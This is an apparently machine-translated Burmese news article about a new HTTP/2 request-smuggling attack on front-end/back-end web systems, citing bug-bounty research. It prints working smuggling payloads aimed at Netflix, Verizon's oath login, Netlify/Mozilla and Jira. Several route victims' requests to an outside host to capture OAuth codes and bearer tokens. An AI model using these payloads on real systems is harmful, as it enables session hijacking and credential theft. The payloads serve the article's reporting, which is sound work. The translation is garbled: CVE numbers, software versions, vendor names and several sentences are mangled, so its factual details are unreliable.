တောင်းဆိုချက်များကို သပ်သပ်လုပ်ဆောင်နိုင်စေမည့် front-end-backend စနစ်များကို တိုက်ခိုက်ခြင်းအသစ်

HTTP/2 မှတစ်ဆင့် ချိတ်ဆက်မှုများကို လက်ခံပြီး HTTP/1.1 မှတစ်ဆင့် နောက်ကွယ်သို့ ပို့လွှတ်သည့် ဝဘ်စနစ်များသည် “HTTP Request Smuggling” တိုက်ခိုက်မှု၏ မူကွဲအသစ်တစ်ခုထံသို့ အထူးဒီဇိုင်းထုတ်ထားသော သုံးစွဲသူ တောင်းဆိုချက်များကို ပေးပို့ခြင်းဖြင့် ခွင့်ပြုပေးသည့် ဝဘ်စနစ်များ၊ frontend နှင့် backend အကြားတူညီသောစီးဆင်းမှုတွင်အခြားအသုံးပြုသူများထံမှတောင်းဆိုမှုများ၏အကြောင်းအရာများကိုထည့်သွင်းပါ။ တိုက်ခိုက်မှုကို တရားဝင်ဝဘ်ဆိုဒ်တစ်ခုရှိ စက်ရှင်တစ်ခုထဲသို့ အန္တရာယ်ရှိသော JavaScript ကုဒ်ကို ထည့်သွင်းရန်၊ ဝင်ရောက်ခွင့်ကန့်သတ်မှုစနစ်များကို ရှောင်ကွင်းပြီး စစ်မှန်ကြောင်းအထောက်အထားများကို ကြားဖြတ်တားဆီးရန် အသုံးပြုနိုင်သည်။

ပြဿနာသည် ဝဘ် proxies၊ load balancers၊ web accelerators၊ အကြောင်းအရာပေးပို့မှုစနစ်များနှင့် တောင်းဆိုချက်များကို front-end-to-backend ပုံစံဖြင့် ပြန်ညွှန်းသည့် အခြားဖွဲ့စည်းပုံများကို အကျိုးသက်ရောက်သည်။ လေ့လာမှုအား ရေးသားသူသည် Netflix၊ Verizon၊ Bitbucket၊ Netlify CDN နှင့် Atlassian တို့၏ စနစ်များကို တိုက်ခိုက်နိုင်ခြေကို သရုပ်ပြခဲ့ပြီး အားနည်းချက်များကို ဖော်ထုတ်ခြင်းအတွက် ဆုငွေ ဒေါ်လာ ၅၆ဝဝဝ ရရှိခဲ့သည်။ F56 Networks ထုတ်ကုန်များတွင်လည်း အဆိုပါပြဿနာကို အတည်ပြုထားသည်။ ပြဿနာသည် Apache http ဆာဗာ (CVE-5-2021) ရှိ mod_proxy ၏ တစ်စိတ်တစ်ပိုင်း အကျိုးသက်ရောက်မှုရှိသည်)၊ ဗားရှင်း 33193 တွင် ပြုပြင်ရန် မျှော်လင့်ထားသည် (ဆော့ဖ်ဝဲရေးသားသူများကို မေလအစောပိုင်းတွင် အဆိုပါပြဿနာကို အကြောင်းကြားခဲ့ပြီး ၎င်းကို ပြုပြင်ရန် ၃ လ အချိန်ပေးခဲ့ရသည်)။ nginx တွင်၊ "အကြောင်းအရာ-အရှည်" နှင့် "လွှဲပြောင်း-ကုဒ်ပြောင်းခြင်း" ခေါင်းစီးများကို တစ်ပြိုင်နက် သတ်မှတ်နိုင်မှုကို နောက်ဆုံးထုတ်လွှ (2.4.49) တွင် ပိတ်ဆို့ထားသည်။ တိုက်ခိုက်ရေးကိရိယာများကို Burp ကိရိယာအစုံတွင် ထည့်သွင်းထားပြီးဖြစ်ပြီး Turbo Intruder တိုးချဲ့မှုပုံစံဖြင့် ရရှိနိုင်ပါသည်။

အသွားအလာတွင် ထည့်သွင်းထားသော တောင်းဆိုမှုများကို ပေါင်းစပ်ခြင်းနည်းလမ်းအသစ်၏ လုပ်ဆောင်မှုနိယာမသည် လွန်ခဲ့သည့်နှစ်နှစ်က အလားတူသုတေသီမှ ဖော်ထုတ်ခဲ့သော အားနည်းချက်နှင့် ဆင်တူသော်လည်း HTTP/1.1 ထက် တောင်းဆိုမှုများကို လက်ခံသည့် ရှေ့တန်းများအတွက် ကန့်သတ်ထားသည်။ Frontend-backend အစီအစဉ်တွင်၊ တောင်းဆိုမှုများကို တိုက်ရိုက်လုပ်ဆောင်ပေးသည့် backend နှင့် တာရှည်ခံ TCP ချိတ်ဆက်မှုကို တည်ဆောက်ပေးသည့် နောက်ဆက်တွဲ node တစ်ခုမှ လက်ခံရရှိသည် - ဖောက်သည်တောင်းဆိုမှုများကို သတိရကြပါစို့။ ဤဘုံချိတ်ဆက်မှုမှတစ်ဆင့်၊ HTTP ပရိုတိုကောဖြင့် ပိုင်းခြားထားသော ကွင်းဆက်တစ်ခုပြီးတစ်ခုနောက်ဆက်တွဲဖြစ်သော ကွဲပြားခြားနားသောအသုံးပြုသူများထံမှ တောင်းဆိုမှုများကို အများအားဖြင့် ပေးပို့ပါသည်။

မူလ “HTTP Request Smuggling” တိုက်ခိုက်မှုသည် HTTP ခေါင်းစီးများ “အကြောင်းအရာ-အရှည်” ကို အသုံးပြုခြင်း (တောင်းဆိုချက်ရှိ ဒေတာစုစုပေါင်းအရွယ်အစားကို ဆုံးဖြတ်သည်) နှင့် “လွှဲပြောင်း-ကုဒ်နံပါတ်- အပိုင်းလိုက်” (ခွင့်ပြုသည် ဒေတာများကို အပိုင်းအလိုက် လွှဲပြောင်းခြင်း) ကွဲပြားသည်။ ဥပမာအားဖြင့်၊ အကယ်၍ Frontend သည် "Content-Length" ကိုသာ ပံ့ပိုးပေးသော်လည်း "Transfer-Encoding- chunked" ကို လျစ်လျူရှုပါက၊ တိုက်ခိုက်သူသည် "Content-Length" နှင့် "Transfer-Encoding- chunked" ခေါင်းစီးနှစ်ခုလုံးပါရှိသော တောင်းဆိုချက်ကို ပေးပို့နိုင်သော်လည်း၊ အရွယ်အစားသည် "အကြောင်းအရာ-အလျား" သည် အတုံးလိုက်လုပ်ထားသော ကွင်းဆက်၏အရွယ်အစားနှင့် မကိုက်ညီပါ။ ဤကိစ္စတွင်၊ ရှေ့ဆုံးသည် "အကြောင်းအရာ-အရှည်" နှင့်အညီ တောင်းဆိုချက်ကို လုပ်ဆောင်ပြီး ပြန်ညွှန်းပေးမည်ဖြစ်ပြီး၊ "လွှဲပြောင်း-ကုဒ်နံပါတ်- အပိုင်းပိုင်း" နှင့် တိုက်ခိုက်သူ၏တောင်းဆိုချက်၏ ကျန်ရှိသောအမြီးကို အခြေခံ၍ ပိတ်ဆို့ခြင်းပြီးဆုံးရန်အတွက် နောက်ကွယ်မှသည် စောင့်ဆိုင်းနေမည်ဖြစ်ပါသည်။ အခြားသူတစ်ဦး၏ တောင်းဆိုမှု၏အစတွင် နောက်သို့ ပေးပို့မည်ဖြစ်သည်။

မျဉ်းအဆင့်တွင် ခွဲခြမ်းစိတ်ဖြာထားသည့် စာသားပရိုတိုကော HTTP/1.1 နှင့်မတူဘဲ HTTP/2 သည် ဒွိပရိုတိုကောတစ်ခုဖြစ်ပြီး ကြိုတင်သတ်မှတ်ထားသော အရွယ်အစားတစ်ခု၏ ဒေတာဘလောက်များကို စီမံခန့်ခွဲသည်။ သို့သော် HTTP/2 သည် ပုံမှန် HTTP ခေါင်းစီးများနှင့် ကိုက်ညီသော pseudo-headers ကို အသုံးပြုသည်။ HTTP/1.1 ပရိုတိုကောမှတစ်ဆင့် နောက်ကွယ်မှအပြန်အလှန်တုံ့ပြန်မှုကိစ္စတွင်၊ ရှေ့တန်းမှ အဆိုပါ pseudo-ခေါင်းစီးများကို ဆင်တူ HTTP ခေါင်းစီး HTTP/1.1 သို့ ဘာသာပြန်ဆိုသည်။ ပြဿနာမှာ မူရင်းတောင်းဆိုမှု၏ ကန့်သတ်ဘောင်များအကြောင်း အချက်အလက်မရရှိဘဲ Frontend မှသတ်မှတ်ထားသော HTTP ခေါင်းစီးများပေါ်အခြေခံ၍ backend သည် stream များကို ပိုင်းခြားရန် ဆုံးဖြတ်ချက်များချခြင်းဖြစ်ပါသည်။

အထူးသဖြင့်၊ ဒေတာအားလုံး၏အရွယ်အစားကိုသတ်မှတ်ထားသောကြောင့် HTTP/2 တွင်အသုံးမပြုသော်လည်း၊ "အကြောင်းအရာ-အရှည်" နှင့် "လွှဲပြောင်း-ကုဒ်လုပ်ခြင်း" တန်ဖိုးများကို pseudo-headers ပုံစံဖြင့် ပေးပို့နိုင်သည်။ သီးခြားနယ်ပယ်တစ်ခုတွင်။ သို့သော်၊ HTTP/2 တောင်းဆိုချက်အား HTTP/1.1 သို့ပြောင်းလဲခြင်း လုပ်ငန်းစဉ်အတွင်း၊ အဆိုပါ ခေါင်းစီးများကို သယ်ဆောင်သွားပြီး နောက်ကွယ်တွင် ရှုပ်ထွေးသွားနိုင်သည်။ H2.TE နှင့် H2.CL တွင် အဓိက တိုက်ခိုက်မှုမျိုးကွဲ နှစ်ခု ရှိသည်၊ ယင်းတွင် မှားယွင်းနေသော လွှဲပြောင်း-ကုဒ်နံပါတ် သို့မဟုတ် အကြောင်းအရာ-အရှည်တန်ဖိုးဖြင့် ရှေ့တန်းမှ လက်ခံရရှိသည့် တောင်းဆိုချက်ကိုယ်ထည်၏ အမှန်တကယ်အရွယ်အစားနှင့် မကိုက်ညီသည့် နောက်ကွယ်မှ လှည့်ဖြားသွားပါသည်။ HTTP/2 ပရိုတိုကော။

H2.CL တိုက်ခိုက်မှု၏ ဥပမာတစ်ခုသည် Netflix သို့ HTTP/2 တောင်းဆိုချက်တစ်ခုပေးပို့သောအခါ အကြောင်းအရာ-အရှည် pseudo-header တွင် မှားယွင်းသောအရွယ်အစားကို သတ်မှတ်ရန်ဖြစ်သည်။ ဤတောင်းဆိုချက်သည် HTTP/1.1 မှတစ်ဆင့် backend ကိုဝင်ရောက်သည့်အခါ အလားတူ HTTP header Content-Length ကို ထပ်တိုးစေသည်၊ သို့သော် Content-Length ရှိ အရွယ်အစားသည် အမှန်တကယ်တစ်ခုထက်နည်းသောကြောင့်၊ အမြီးရှိ ဒေတာအစိတ်အပိုင်းကို စီမံဆောင်ရွက်ပေးသည် နောက်တောင်းဆိုမှု၏အစ။

ဥပမာအားဖြင့် HTTP/2 :method POST :path /n :authority www.netflix.com content-length 4 abcdGET /n HTTP/1.1 Host: 02.rs?x.netflix.com Foo: bar

နောက်ကွယ်မှ တောင်းဆိုချက်တစ်ခု ပေးပို့ခြင်း ရလဒ်ဖြစ်လိမ့်မည်- POST /n HTTP/1.1 လက်ခံသူ- www.netflix.com အကြောင်းအရာ-အရှည်- 4 abcdGET /n HTTP/1.1 လက်ခံဆောင်ရွက်ပေးသူ- 02.rs?x.netflix.com Foo: ဘား

Content-Length သည် တန်ဖိုး 4 ဖြစ်သောကြောင့်၊ backend သည် တောင်းဆိုချက်၏ကိုယ်ထည်အဖြစ် "abcd" ကိုသာ လက်ခံမည်ဖြစ်ပြီး ကျန် "GET /n HTTP/1.1..." ၏နောက်ဆက်တွဲတောင်းဆိုမှု၏အစအဖြစ် လုပ်ဆောင်သွားပါမည်။ အခြားအသုံးပြုသူနှင့် ဆက်စပ်နေသည်။ ထို့ကြောင့်၊ stream သည် ရပ်တန့်သွားမည်ဖြစ်ပြီး နောက်တောင်းဆိုချက်အတွက် တုံ့ပြန်မှုအနေဖြင့်၊ dummy တောင်းဆိုမှုကို လုပ်ဆောင်ခြင်း၏ရလဒ်ကို ထုတ်ပြန်ပါမည်။ Netflix ၏ကိစ္စရပ်တွင်၊ "Host:" ခေါင်းစီးတွင် ပြင်ပမှအိမ်ရှင်တစ်ဦးကို သတ်မှတ်ခြင်းမှာ dummy တောင်းဆိုချက်ကြောင့် client မှ "တည်နေရာ- https://02.rs?x.netflix.com/n" နှင့် တုံ့ပြန်မှုကို ပြန်ပေးခဲ့သည်။ Netflix ဆိုက်၏ ဆက်စပ်မှုတွင် သင်၏ JavaScript ကုဒ်ကို ဖွင့်ခြင်း အပါအဝင် မထင်သလို အကြောင်းအရာများကို သုံးစွဲသူထံ ပေးပို့ရန် ခွင့်ပြုထားသည်။

ဒုတိယ တိုက်ခိုက်မှု ရွေးချယ်မှု (H2.TE) တွင် “Transfer-Encoding- chunked” ခေါင်းစီးကို အစားထိုးခြင်း ပါဝင်သည်။ HTTP/2 တွင် လွှဲပြောင်း-ကုဒ်ဝှက်ထားသော pseudo-header ကို အသုံးပြုခြင်းကို သတ်မှတ်ချက်များဖြင့် တားမြစ်ထားပြီး ၎င်းနှင့် တောင်းဆိုချက်များကို မှားယွင်းသည်ဟု သတ်မှတ်သည်။ ယင်းကဲ့သို့ဖြစ်လင့်ကစား၊ အချို့သော frontend အကောင်အထည်ဖော်မှုများသည် ဤလိုအပ်ချက်ကို ထည့်သွင်းစဉ်းစားခြင်းမရှိဘဲ HTTP/2 တွင် လွှဲပြောင်း-ကုဒ်ဝှက်ထားသော pseudo-header ကို အသုံးပြုခွင့်မပြုဘဲ၊ ၎င်းသည် အလားတူ HTTP ခေါင်းစီးအဖြစ်သို့ ပြောင်းလဲသွားသော HTTP/0 တွင် ဖြစ်သည်။ “Transfer-Encoding” ခေါင်းစီးရှိပါက၊ နောက်ခံလူသည် ၎င်းကို ပိုမိုဦးစားပေးအဖြစ် ယူနိုင်ပြီး “အတုံးလိုက်အတုံးလိုက်” မုဒ်တွင် “{size}\r\n{block” ပုံစံဖြင့် ကွဲပြားသောအရွယ်အစားတုံးများကို အသုံးပြုကာ ဒေတာအပိုင်းကို အပိုင်းပိုင်းခွဲခြမ်းစိတ်ဖြာနိုင်သည် }\r\n{size} \r\n{block}\r\nXNUMX", အလုံးစုံအရွယ်အစားဖြင့် ကနဦးပိုင်းခြားထားသော်လည်း၊

ထိုကဲ့သို့သောကွာဟချက်ရှိနေခြင်းကို Verizon ၏ဥပမာအားဖြင့်ပြသခဲ့သည်။ အဆိုပါပြဿနာသည် Huffington Post နှင့် Engadget ကဲ့သို့သော ဝဘ်ဆိုက်များတွင် အသုံးပြုသည့် အထောက်အထားစိစစ်ခြင်းပေါ်တယ်နှင့် အကြောင်းအရာစီမံခန့်ခွဲမှုစနစ်တို့နှင့် သက်ဆိုင်ပါသည်။ ဥပမာအားဖြင့်၊ HTTP/2 မှတဆင့် client တောင်းဆိုချက်- :method POST :path /identitfy/XUI :authority id.b2b.oath.com လွှဲပြောင်း-ကုဒ်နံပါတ်ကို အပိုင်းလိုက် 0 GET /oops HTTP/1.1 Host- psres.net အကြောင်းအရာ-အရှည်- 10 x=

နောက်ကွယ်မှ HTTP/1.1 တောင်းဆိုချက်တစ်ခု ပေးပို့ခြင်းမှ ရလဒ်- POST /identity/XUI HTTP/1.1 Host: id.b2b.oath.com အကြောင်းအရာ-အရှည်- 66 Transfer-Encoding- chunked 0 GET /oops HTTP/1.1 Host: psres။ အသားတင် အကြောင်းအရာ- အရှည်- 10x=

တစ်ဖန် နောက်ခံလူသည် "အကြောင်းအရာ-အရှည်" ခေါင်းစီးကို လျစ်လျူရှုခဲ့ပြီး "လွှဲပြောင်း-ကုဒ်သွင်းခြင်း- chunked" ကို အခြေခံ၍ ထုတ်လွှင့်မှုအတွင်းပိုင်းခြားခြင်းကို လုပ်ဆောင်ခဲ့သည်။ လက်တွေ့တွင်၊ တိုက်ခိုက်မှုသည် OAuth စစ်မှန်ကြောင်းအထောက်အထားပြခြင်းနှင့် သက်ဆိုင်သည့် တောင်းဆိုချက်များကို ကြားဖြတ်ခြင်းအပါအဝင်၊ ကိုးကားသူခေါင်းစီးတွင်ပြသထားသည့် ကန့်သတ်ချက်များအပြင် အထောက်အထားစိစစ်ရေးအပိုင်းကို အတုယူကာ အသုံးပြုသူ၏စနစ်အား အထောက်အထားများပေးပို့ရန် စနစ်အစပျိုးခြင်းအပါအဝင် အသုံးပြုသူတောင်းဆိုမှုများကို ၎င်းတို့၏ဝဘ်ဆိုက်သို့ လမ်းကြောင်းပြန်ညွှန်နိုင်စေခဲ့သည်။ တိုက်ခိုက်သူ၏အိမ်ရှင်ထံသို့ ရယူပါ /b2blanding/show/oops HTTP/1.1 လက်ခံသူ- psres.net ရည်ညွှန်းသူ- https://id.b2b.oath.com/?…&code=secret GET / HTTP/1.1 လက်ခံဆောင်ရွက်ပေးသူ- psres.net ခွင့်ပြုချက်- Bearer eyJhcGwiOiJIUzI1Gi1sInR6cCI6Ik

Transfer-encoding pseudo-header ကို သတ်မှတ်ထားခြင်း မပြုသော HTTP/2 အကောင်အထည်ဖော်မှုများကို တိုက်ခိုက်ရန်အတွက်၊ ၎င်းအား လိုင်းအသစ်အက္ခရာဖြင့် ခြားထားသော အခြား pseudo-headers များနှင့် ချိတ်ဆက်ခြင်းဖြင့် "Transfer-Encoding" ခေါင်းစီးကို အစားထိုးရန် အခြားနည်းလမ်းကို အဆိုပြုထားပါသည်။ ဤကိစ္စတွင် HTTP/1.1 သို့ပြောင်းသောအခါ သီးခြား HTTP ခေါင်းစီးနှစ်ခုကို ဖန်တီးသည်)။

ဥပမာအားဖြင့်၊ Atlassian Jira နှင့် Netlify CDN (Firefox တွင် Mozilla စတင်စာမျက်နှာကိုအသုံးပြုရန်အသုံးပြုသည်) ဤပြဿနာကြောင့် ထိခိုက်ခဲ့သည်။ အထူးသဖြင့်၊ HTTP/2 တောင်းဆိုချက်-နည်းလမ်း POST :path / :authority start.mozilla.org foo b\r\n လွှဲပြောင်း-ကုဒ်နံပါတ်- 0\r\n \r\n GET / HTTP/1.1\r\n လက်ခံဆောင်ရွက်ပေးသည် : evil-netlify-domain\r\n အကြောင်းအရာ-အရှည်- 5\r\n \r\nx=

ရလဒ်အနေဖြင့် HTTP/1.1 POST / HTTP/1.1 တောင်းဆိုချက်ကို backend သို့ ပေးပို့ခြင်း\r\n Host- start.mozilla.org\r\n Foo: b\r\n Transfer-Encoding- chunked\r\n အကြောင်းအရာ-အရှည် : 71\ r\n \r\n 0\r\n \r\n GET / HTTP/1.1\r\n Host- evil-netlify-domain\r\n အကြောင်းအရာ-အရှည်- 5\r\n \r \nx=

“Transfer-Encoding” ခေါင်းစီးကို အစားထိုးရန် အခြားရွေးချယ်စရာမှာ ၎င်းကို အခြားသော pseudo-header ၏ အမည် သို့မဟုတ် တောင်းဆိုမှုနည်းလမ်းဖြင့် စာကြောင်းတစ်ခုသို့ ပူးတွဲရန်ဖြစ်သည်။ ဥပမာအားဖြင့်၊ Atlassian Jira ကိုဝင်ရောက်သည့်အခါ၊ တန်ဖိုး "အတုံးအပြဲ" ဖြင့် "foo: bar" နှင့် "transfer-encoding: chunked" နှင့် pseudo-header name "foo: bar\r\ntransfer-encoding" သည် HTTP ခေါင်းစီးများကို "foo: bar" နှင့် "transfer-encoding: chunked" တို့ကို ထည့်သွင်းစေခဲ့သည်။ နှင့် pseudo-header ":method" တန်ဖိုး သတ်မှတ်ခြင်း "GET / HTTP/1.1\r\nTransfer-encoding: chunked" ကို "GET / HTTP/1.1\r\ntransfer-encoding: chunked" သို့ ဘာသာပြန်ဆိုထားပါသည်။

ပြဿနာကို ဖော်ထုတ်ခဲ့သော သုတေသီသည် ရှေ့တန်းများကို တိုက်ခိုက်ရန် တောင်းဆိုသည့် ဥမင်လှိုဏ်ခေါင်းနည်းပညာကို အဆိုပြုခဲ့ပြီး IP လိပ်စာတစ်ခုစီသည် နောက်ကွယ်သို့ သီးခြားချိတ်ဆက်မှုတစ်ခု ပြုလုပ်ပေးကာ မတူညီသော အသုံးပြုသူများထံမှ သွားလာမှု ရောထွေးခြင်းမရှိပေ။ အဆိုပြုထားသောနည်းပညာသည် အခြားအသုံးပြုသူများထံမှ တောင်းဆိုမှုများကို ဝင်ရောက်စွက်ဖက်ခြင်းအား ခွင့်မပြုသော်လည်း၊ အခြားတောင်းဆိုမှုများကို လုပ်ဆောင်ခြင်းအပေါ် သက်ရောက်မှုရှိသော မျှဝေထားသော ကက်ရှ်ကို အဆိပ်သင့်စေကာ ဝန်ဆောင်မှုအချက်အလက်များကို ရှေ့တန်းမှ နောက်ကွယ်သို့ လွှဲပြောင်းရာတွင် အသုံးပြုသည့် အတွင်းပိုင်း HTTP ခေါင်းစီးများကို အစားထိုးခွင့်ပြုသည် ( ဥပမာအားဖြင့်၊ ထိုကဲ့သို့သော ခေါင်းစီးများရှိ ရှေ့တန်းဘက်တွင် စစ်မှန်ကြောင်း အထောက်အထားပြသည့်အခါ လက်ရှိအသုံးပြုသူ၏ အချက်အလက်များကို နောက်ကွယ်သို့ ပို့နိုင်သည်)။ ကက်ရှ်အဆိပ်ခတ်ခြင်းကို အသုံးပြု၍ လက်တွေ့တွင် အဆိုပါနည်းလမ်းကို ကျင့်သုံးခြင်း၏ဥပမာတစ်ခုအနေဖြင့် Bitbucket ဝန်ဆောင်မှုရှိ စာမျက်နှာများကို ထိန်းချုပ်နိုင်ခဲ့သည်။

source: opennet.ru